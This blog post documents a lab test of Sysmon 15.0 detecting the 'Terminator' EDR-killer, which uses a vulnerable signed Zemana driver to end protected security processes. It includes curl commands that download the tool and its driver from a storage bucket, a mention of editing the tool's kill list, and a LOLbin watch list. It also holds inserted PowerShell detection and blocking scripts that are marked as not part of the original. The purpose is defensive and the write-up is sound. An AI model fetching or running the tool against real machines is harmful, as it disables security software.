Sysmon 15.0 VS Spyboy Terminator

Chayanin Khawsanit
8 min read · Jul 25, 2023


About Terminator

On May 21, 2023, a forum user named Spyboy advertised a tool called “Terminator” on a Russian-language cybercrime forum, claiming it could bypass 23 EDR and AV products. Spyboy priced the software from $300 USD (a single bypass) to $3,000 USD (the all-in-one bypass).

Terminator requires administrative privileges, and the User Account Control (UAC) prompt must be accepted, for it to function. When executed it writes a legitimate, signed Zemana Anti-Malware driver to the C:\Windows\System32\drivers\ folder. In normal use this driver is named zamguard64.sys or zam64.sys. After dropping the Zemana driver, Terminator uses it to disable security solutions.

This is the Bring Your Own Vulnerable Driver (BYOVD) technique: the malware drops a legitimately signed but vulnerable driver onto the victim’s machine, loads it into the kernel, and abuses the driver’s flaws to perform privileged actions (such as killing protected processes) with SYSTEM-level access.

The Zemana AntiMalware driver (zamguard64.sys) in versions before 3.2.28 and the Zemana AntiLogger driver (zam64.sys) in versions before 2.74.204.664 are affected by an incorrect access control vulnerability tracked under two CVEs:

  1. CVE-2023-36205: an IOCTL allows a non-privileged user to open a handle to any privileged process.

  2. CVE-2023-36204: an IOCTL grants unrestricted disk read/write capabilities.

Note: an IOCTL (I/O control code) is a request that an application sends directly to a device driver through the DeviceIoControl function.

About Sysmon 15.0

On June 27, 2023, Microsoft Sysinternals released Sysmon 15.0. In this version the Sysmon service runs as a protected process (Protected Process Light), hardening it against tampering, and a new event, FileExecutableDetected (Event ID 29), is generated when a new executable image is written to a file.

Protected process light (PPL)

Windows 8.1 and later have the concept of Protected Process Light (PPL), which lets specially signed programs run in such a way that they are immune to tampering and termination from user mode, even by administrative users. The goal is to prevent malware from simply terminating security products or injecting malicious code into their processes. The protection is enforced by the kernel against user-mode callers only; code that already runs in kernel mode, such as a loaded driver, is not subject to it.

We can use Process Hacker to check which processes are protected by PPL. In the process properties it is shown as “Protection: Light (Antimalware)”.

Example of PPL protection

The process cannot be terminated, even with administrator privileges.

Unable to Terminate Sysmon

Lab Environment Preparation

I decided to use Windows 10 Pro Version 21H2 OS build 19044.1889 as my testing environment and installed the following programs.

  • Malwarebytes: The process named MBAMService.exe is protected by PPL. Before executing Terminator, I set an exclusion path to prevent it from being quarantined by the anti-malware scanner.
MBAMService.exe is protected by PPL
  • Sysmon version 15.0: The process named Sysmon.exe is protected by PPL. I used the Sysmon config from olafhartong (Reference: https://github.com/olafhartong/sysmon-modular) and then changed the configuration to monitor Terminator’s actions.
  • Event ID 5 Process Terminated: I changed it to monitor all programs on drive C.
Sysmon configuration Event ID 5
  • Event ID 29 File Executable Detected: I changed it to monitor living-off-the-land activity such as curl, FTP, etc.
Sysmon configuration Event ID 29
  • Microsoft Defender Antivirus enabled: The Antimalware Service Executable process, MsMpEng.exe, is protected by PPL.
MsMpEng.exe was protected by PPL
  • Wireshark: The process named Wireshark.exe is not protected by PPL.
Wireshark.exe is not protected by PPL
  • Splunk Universal Forwarder: The process named splunkd.exe is not protected by PPL.
splunkd.exe is not protected by PPL
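The two configuration changes listed above, written out as an added example (this is not the post’s own config nor a file from sysmon-modular): a minimal Sysmon 15.0 configuration that logs Event ID 5 for every image on drive C and Event ID 29 for a set of living-off-the-land download tools, applied from PowerShell. It assumes Sysmon64.exe is installed and reachable at C:\Tools\Sysmon64.exe (a path chosen for the example) and that the config is applied on its own rather than merged into the modular build; the schemaversion is the one Sysmon 15.0 reports (confirm with Sysmon64.exe -s if your build differs).

```powershell
# Added example: minimal Sysmon 15.0 config for the Terminator lab (not from the original post).
# Assumption: Sysmon64.exe lives at C:\Tools\Sysmon64.exe; adjust the path to your install.
$config = @'
<Sysmon schemaversion="4.90">
  <!-- md5 is kept so Event 6/29 hashes can be compared with the MD5 quoted in the post;
       sha256 is what LOLDrivers publishes. -->
  <HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms>
  <EventFiltering>
    <!-- Event ID 5: log termination of every process whose image lives on drive C -->
    <RuleGroup name="ProcessTerminate_all_of_C" groupRelation="or">
      <ProcessTerminate onmatch="include">
        <Image condition="begin with">C:\</Image>
      </ProcessTerminate>
    </RuleGroup>
    <!-- Event ID 29: log PE files written by living-off-the-land download tools.
         condition="image" matches on the image file name, so no full paths are needed. -->
    <RuleGroup name="FileExecutableDetected_lolbins" groupRelation="or">
      <FileExecutableDetected onmatch="include">
        <Image condition="image">curl.exe</Image>
        <Image condition="image">ftp.exe</Image>
        <Image condition="image">certutil.exe</Image>
        <Image condition="image">bitsadmin.exe</Image>
        <Image condition="image">powershell.exe</Image>
        <Image condition="image">pwsh.exe</Image>
        <!-- browsers as well, so the Edge/Chrome download path is covered too -->
        <Image condition="image">chrome.exe</Image>
        <Image condition="image">msedge.exe</Image>
      </FileExecutableDetected>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
'@

$path = Join-Path $env:TEMP 'sysmon-terminator-lab.xml'
Set-Content -Path $path -Value $config -Encoding ASCII

# Apply to an already-running Sysmon service. For a first install use: -accepteula -i $path
& 'C:\Tools\Sysmon64.exe' -c $path

# Verify the rules took effect: -c with no file prints the active configuration.
& 'C:\Tools\Sysmon64.exe' -c
```

Note that -c replaces the whole active rule set, so in production these two rule groups belong inside your full configuration rather than applied alone.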

Terminator Malware Preparation

Sadly, I couldn’t find the original Spyboy Terminator, so I decided to use the reproduction of Terminator created by ZeroMemoryEx.
I changed some code by removing Sysmon from the EDR kill list so that I could monitor the activity, and then built it into an executable file.

The vulnerable driver is already provided by ZeroMemoryEx in this GitHub repository: https://github.com/ZeroMemoryEx/Terminator, or you can download it from LOLDrivers: https://www.loldrivers.io/, which maintains an updated list of vulnerable drivers.

Remove Sysmon from the EDR list

Detecting Terminator activity with Sysmon

Downloading Terminator.sys using Edge and Chrome

Event ID 29: FileExecutableDetected

This event is generated when Sysmon detects the creation of a new executable file (PE format).

The file was downloaded to “C:\Users\ewiges\Downloads\” using Google Chrome, and its MD5 is “21E13F2CB269DEFEAE5E1D09887D47BB”.

Event ID 29 FileExecutableDetected

According to VirusTotal, this file is the vulnerable Zemana driver (Zemana.sys).

Virustotal detected Zemana.sys

Event ID 15: FileCreateStreamHash

This event captures the creation of alternate data streams; browsers attach a Zone.Identifier “mark of the web” stream to every downloaded file, which is what triggers it here.

If you download a file with a browser, this event carries some of the same information as Event ID 29: Image, TargetFilename, and the file’s hash.

Event ID 15 FileCreateStreamHash: contains Hash

A second Event ID 15 for the same download contains the zone transfer information, including the HostUrl field, which shows the source URL: https://storage.googleapis.com/billy_herrington.

Event ID 15 FileCreateStreamHash: contains HostURL
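The Zone.Identifier stream that Event ID 15 surfaces can also be read straight off the file on a host without Sysmon. The following is an added example, not code from the post: it parses the [ZoneTransfer] block from a file’s Zone.Identifier stream. The sample file and its stream are constructed here so the script runs offline (the HostUrl value is the curl URL used later in the post); the only assumption is an NTFS volume, since alternate data streams do not exist on FAT.

```powershell
# Added example: read the browser's mark-of-the-web stream (not from the original post).
function Get-MarkOfTheWeb {
    # Parse the INI-style [ZoneTransfer] block from a file's Zone.Identifier stream
    # into an ordered hashtable (ZoneId, HostUrl, ReferrerUrl, ...).
    param([Parameter(Mandatory)][string]$Path)
    $lines = Get-Content -LiteralPath $Path -Stream Zone.Identifier -ErrorAction Stop
    $motw = [ordered]@{}
    foreach ($line in $lines) {
        # skip the "[ZoneTransfer]" header; keep key=value lines
        if ($line -match '^(?<k>[^=\[\]]+)=(?<v>.*)$') { $motw[$Matches.k] = $Matches.v }
    }
    return $motw
}

# --- constructed sample: a placeholder file carrying the stream Chrome would write ---
$file = Join-Path $env:TEMP 'Terminator.sys.sample'
Set-Content -LiteralPath $file -Value 'placeholder bytes, not a real driver'
Set-Content -LiteralPath $file -Stream Zone.Identifier -Value @(
    '[ZoneTransfer]',
    'ZoneId=3',
    'HostUrl=https://storage.googleapis.com/billy_herrington/Terminator.sys'
)

$motw = Get-MarkOfTheWeb -Path $file
$motw

# ZoneId 3 is the Internet zone. A .sys file that arrived from an external object store
# is exactly the kind of artifact worth pulling a hash for and checking against LOLDrivers.
if ($motw.ZoneId -eq '3') { "Internet-zone download from $($motw.HostUrl)" }
```

The same function works on a real download: point it at the .sys in the Downloads folder and compare the HostUrl with the one Sysmon recorded in Event ID 15.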

Event ID 11: FileCreate

This event records only which process created the file and the filename; it does not include a hash.

Event ID 11 FileCreate

Downloading Terminator.exe and Terminator.sys using curl

Event ID 1: Process creation

If I download Terminator using curl, Sysmon logs the command that I executed from the command line.

The interesting fields are ParentImage, Image, and CommandLine.

Command to Download vulnerable driver:

curl https://storage.googleapis.com/billy_herrington/Terminator.sys -o Terminator.sys
Event ID 1 Process creation: Terminator.sys

Command to Download Terminator executable file:

curl https://storage.googleapis.com/billy_herrington/Terminator.exe -o Terminator.exe
Event ID 1 Process creation: Terminator.exe

Event ID 11: FileCreate

This event shows that the user ewiges downloaded Terminator.sys and Terminator.exe to the Desktop using curl.exe.

Event ID 11 File Create: Terminator.sys
Event ID 11 File Create: Terminator.exe

Event ID 29: FileExecutableDetected

This event’s information is similar to FileCreate, but it also includes the file hash.

Event ID 29 FileExecutableDetected: Terminator.sys
Event ID 29 FileExecutableDetected: Terminator.exe

Terminator Execution

Event ID 1: Process creation

Terminator.exe was started by the parent process explorer.exe, which means the user launched Terminator manually (for example, by double-clicking it).

Event ID 1 Process creation: Executed Terminator.exe

Event ID 13: RegistryEvent (Value Set)

A registry event is written immediately after execution.

The “TargetObject” in this event is HKLM\System\CurrentControlSet\Services\Terminator\ImagePath.

The HKLM\SYSTEM\CurrentControlSet\Services registry tree stores information about every service and driver on the system.
Each driver has a key of the form HKLM\SYSTEM\CurrentControlSet\Services\DriverName.

ImagePath is the value that specifies the fully qualified path of the driver’s image file.

The “Details” field gives the value that was written: “C:\Users\ewiges\Desktop\Terminator.sys”.

This means the Terminator application created a kernel driver service named Terminator, running with NT AUTHORITY\SYSTEM privilege, whose image file is Terminator.sys. An ImagePath under Services that points into a user profile directory is itself a strong signal, because legitimate drivers are installed under C:\Windows\System32\drivers.

Event ID 13 RegistryEvent (Value Set)

Event ID 6: Driver loaded

Driver-loaded events provide information about a driver being loaded on the system.

This event shows Terminator.sys, which carries a valid signature from Zemana and so looks like a legitimate driver, being loaded into the kernel.

The event also includes the file hashes, which can be compared against a vulnerable-driver list such as LOLDrivers to determine whether the driver is vulnerable or malicious.

Event ID 6 Driver loaded: loaded Terminator.sys into System

Event ID 5: Process terminated

Finally, the security processes are terminated by Terminator, but the information in Event ID 5 is insufficient to identify that the Terminator application terminated them: Sysmon records only the terminated process, its PID and the user it ran as, not which process or driver issued the termination.

The processes therefore appear as if they had simply exited under their own accounts, for example MsMpEng.exe (Antimalware Service Executable) running as SYSTEM and splunkd.exe (Splunk forwarder) running as the service user SplunkForwarder.

We need to correlate the earlier Sysmon events (the Event ID 13 service registration and the Event ID 6 driver load) with this event to establish that a security process was terminated by Terminator.

Event ID 5 Process terminated: MsMpEng.exe (Antimalware service executable)
Event ID 5 Process terminated: MBAMService.exe (Malwarebytes)
Event ID 5 Process terminated: SecurityHealthService.exe (Windows Security Health Service)
Event ID 5 Process terminated: Wireshark.exe (Wireshark)
Event ID 5 Process terminated: splunkd.exe (Splunk Forwarder)
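The correlation described above, as an added example that is not part of the original post: it links Event ID 6 driver loads that come from outside System32\drivers or match a known-vulnerable hash to the Event ID 13 ImagePath that registered the file and to Event ID 5 terminations of security tooling within a short window. The hash list holds only the Terminator.sys MD5 quoted earlier, the security-process names are illustrative, and the sample events are constructed to mirror the lab run (field names follow Sysmon’s schema; the paths and signer string are made up for the example). A live path that reads the Sysmon operational log with Get-WinEvent is included for use on a real host.

```powershell
# Added example: tie Event 5 terminations back to a BYOVD driver load (not from the original post).

$KnownVulnerableMD5 = @('21E13F2CB269DEFEAE5E1D09887D47BB')   # Terminator.sys MD5 quoted in the post
$SecurityProcesses  = @('MsMpEng.exe', 'MBAMService.exe', 'SecurityHealthService.exe',
                        'Sysmon.exe', 'Sysmon64.exe', 'splunkd.exe', 'Wireshark.exe')

function ConvertFrom-SysmonEvent {
    # Flatten one Sysmon EventRecord into a hashtable keyed by EventData field name.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Record)
    $xml  = [xml]$Record.ToXml()
    $data = @{ Id = $Record.Id; Time = $Record.TimeCreated }
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

function Get-SysmonEvents {
    # Live path: read Event IDs 5, 6 and 13 from the Sysmon log (needs an elevated shell).
    param([datetime]$Since = (Get-Date).AddHours(-1))
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 5, 6, 13; StartTime = $Since } |
        ForEach-Object { ConvertFrom-SysmonEvent $_ }
}

function Get-Md5FromHashes {
    # Sysmon writes Hashes as "MD5=...,SHA256=...,IMPHASH=..."; return the MD5 part.
    param([string]$Hashes)
    foreach ($part in ($Hashes -split ',')) {
        if ($part -like 'MD5=*') { return $part.Substring(4).ToUpperInvariant() }
    }
    return $null
}

function Find-ByovdKillChain {
    param([hashtable[]]$Events, [int]$WindowMinutes = 5)
    $findings = @()
    # Step 1 (Event 6): a driver loaded from outside System32\drivers, or with a known-vulnerable hash.
    $suspectLoads = $Events | Where-Object {
        $_.Id -eq 6 -and (
            $_.ImageLoaded -notlike 'C:\Windows\System32\drivers\*' -or
            $KnownVulnerableMD5 -contains (Get-Md5FromHashes $_.Hashes))
    }
    foreach ($load in $suspectLoads) {
        # Step 2 (Event 13): the Services\<name>\ImagePath value that registered this file.
        $svc = $Events | Where-Object {
            $_.Id -eq 13 -and
            $_.TargetObject -like 'HKLM\System\CurrentControlSet\Services\*\ImagePath' -and
            $_.Details -like "*$($load.ImageLoaded)"
        } | Select-Object -First 1
        # Step 3 (Event 5): security tooling terminated within the window after the load.
        $kills = @($Events | Where-Object {
            $_.Id -eq 5 -and
            $_.Time -ge $load.Time -and $_.Time -le $load.Time.AddMinutes($WindowMinutes) -and
            $SecurityProcesses -contains (Split-Path -Path $_.Image -Leaf)
        })
        if ($kills.Count -eq 0) { continue }
        $service   = if ($svc) { $svc.TargetObject } else { '(no Event 13 seen)' }
        $installer = if ($svc) { $svc.Image } else { $null }
        $findings += [pscustomobject]@{
            Driver     = $load.ImageLoaded
            MD5        = Get-Md5FromHashes $load.Hashes
            Signature  = $load.Signature
            Service    = $service
            Installer  = $installer
            Terminated = ($kills | ForEach-Object { Split-Path -Path $_.Image -Leaf }) -join ', '
        }
    }
    return $findings
}

# --- constructed sample events mirroring the lab run (values made up; not real log output) ---
$t0 = Get-Date '2023-07-20T10:00:00'
$Sample = @(
    @{ Id = 13; Time = $t0; Image = 'C:\Users\ewiges\Desktop\Terminator.exe'
       TargetObject = 'HKLM\System\CurrentControlSet\Services\Terminator\ImagePath'
       Details = 'C:\Users\ewiges\Desktop\Terminator.sys' },
    @{ Id = 6;  Time = $t0.AddSeconds(1); ImageLoaded = 'C:\Users\ewiges\Desktop\Terminator.sys'
       Hashes = 'MD5=21E13F2CB269DEFEAE5E1D09887D47BB'; Signed = 'true'; Signature = 'Zemana Ltd.' },
    @{ Id = 5;  Time = $t0.AddSeconds(5); Image = 'C:\Program Files\Windows Defender\MsMpEng.exe'; User = 'NT AUTHORITY\SYSTEM' },
    @{ Id = 5;  Time = $t0.AddSeconds(6); Image = 'C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe'; User = 'NT SERVICE\SplunkForwarder' },
    @{ Id = 5;  Time = $t0.AddMinutes(30); Image = 'C:\Windows\System32\notepad.exe'; User = 'DESKTOP\ewiges' }  # unrelated, outside window
)
Find-ByovdKillChain -Events $Sample | Format-List
# Against the live log instead:  Find-ByovdKillChain -Events (Get-SysmonEvents) | Format-List
```

On the sample the single finding names Terminator.sys, the Terminator service key, Terminator.exe as the installer, and MsMpEng.exe and splunkd.exe as the processes terminated inside the window; the notepad.exe exit 30 minutes later is ignored. The driver-path check matters as much as the hash check: a repacked or newer vulnerable driver will not be on any list, but it still has to be registered and loaded from somewhere.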

Prevention

If you use Sysmon, you can prevent the driver from ever reaching disk by using Event ID 27, FileBlockExecutable.

You can use the following Sysmon configuration.

Sysmon Event ID 27 configuration :
https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sysmon/sysmon_config_vulnerable_hashes_block.xml

Sysmon Event ID 27 configuration

If you use another EDR, you can add the vulnerable drivers’ hashes to its block list to prevent threat actors from using them.

Vulnerable drivers’ Hash : https://www.loldrivers.io/

Website loldrivers.io
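The linked LOLDrivers configuration is the ready-made option. As an added example (not the post’s own config and not the LOLDrivers project’s file), the following builds a FileBlockExecutable rule group from a list of hashes so the same rule can be regenerated from your own list. The sample list is constructed and holds only the Terminator.sys MD5 quoted earlier; the Get-LolDriversHashes function assumes the LOLDrivers JSON feed at https://www.loldrivers.io/api/drivers.json with KnownVulnerableSamples entries carrying a SHA256 field, which should be verified against the current feed before relying on it.

```powershell
# Added example: generate a Sysmon FileBlockExecutable rule set from vulnerable-driver hashes
# (not from the original post).

function New-SysmonBlockConfig {
    # $Hashes entries use Sysmon's "ALG=HEX" form (e.g. "SHA256=ABCD...") so that a
    # 'contains' match works against the Hashes field, which reads "MD5=...,SHA256=...,IMPHASH=...".
    param([Parameter(Mandatory)][string[]]$Hashes)
    $rules = foreach ($h in ($Hashes | Sort-Object -Unique)) {
        "        <Hashes condition=`"contains`">$h</Hashes>"
    }
    @"
<Sysmon schemaversion="4.90">
  <HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms>
  <EventFiltering>
    <RuleGroup name="Block_vulnerable_drivers" groupRelation="or">
      <FileBlockExecutable onmatch="include">
$($rules -join "`n")
      </FileBlockExecutable>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
"@
}

function Get-LolDriversHashes {
    # ASSUMPTION: feed URL and property names as of the time of writing; check the schema
    # at https://www.loldrivers.io/ before use.
    $feed = Invoke-RestMethod -Uri 'https://www.loldrivers.io/api/drivers.json'
    foreach ($drv in $feed) {
        foreach ($s in $drv.KnownVulnerableSamples) {
            if ($s.SHA256) { "SHA256=$($s.SHA256.ToUpperInvariant())" }
        }
    }
}

# Constructed sample: only the Terminator.sys MD5 from the post. Because the rule matches on
# the hash the PE had when written, it blocks this exact sample and nothing else.
$sample = @('MD5=21E13F2CB269DEFEAE5E1D09887D47BB')
$xml    = New-SysmonBlockConfig -Hashes $sample
$path   = Join-Path $env:TEMP 'sysmon-block-drivers.xml'
Set-Content -Path $path -Value $xml -Encoding ASCII
$xml

# To use the full list instead:  New-SysmonBlockConfig -Hashes (Get-LolDriversHashes)
# Apply (merge into your full config first; -c replaces the active rule set):
# & 'C:\Tools\Sysmon64.exe' -c $path
```

Hash-based blocking is only as good as the list: a vulnerable driver version that is not yet catalogued passes through, so pair it with alerting on drivers loaded from outside System32\drivers (Event ID 6).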

Event ID 27: FileBlockExecutable

This event is generated when Sysmon detects and blocks the creation of an executable file (PE format) that matches a FileBlockExecutable rule.

When it fires, the vulnerable driver never reaches disk, and the event records which process attempted to write the file along with the file’s hash.

Event ID 27 FileBlockExecutable: When it blocked Terminator.sys

This rule also prevented me from downloading another vulnerable driver.

Event ID 27 FileBlockExecutable: When it blocked vulnerable driver downloaded by chrome

After checking with VirusTotal, this vulnerable driver is Rtcore64.sys.

Virustotal detected driver as Rtcore64.sys

Conclusion

When Terminator is executed it terminates every AV and EDR process, including Sysmon, even though those processes are protected by PPL, because the termination is carried out from the kernel through the vulnerable driver rather than from user mode. You can defend against it by using your EDR or Sysmon to block known vulnerable drivers from being written to disk. Since hash-based blocking covers only samples already on the list, it should be combined with Microsoft’s vulnerable driver blocklist (enforced through HVCI / WDAC) and with alerting on Event ID 6 driver loads from outside C:\Windows\System32\drivers.

Reference

https://www.reddit.com/r/crowdstrike/comments/13wjrgn/20230531_situational_awareness_spyboy_defense/

https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36

https://voidsec.com/reverse-engineering-terminator-aka-zemana-antimalware-antilogger-driver/

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
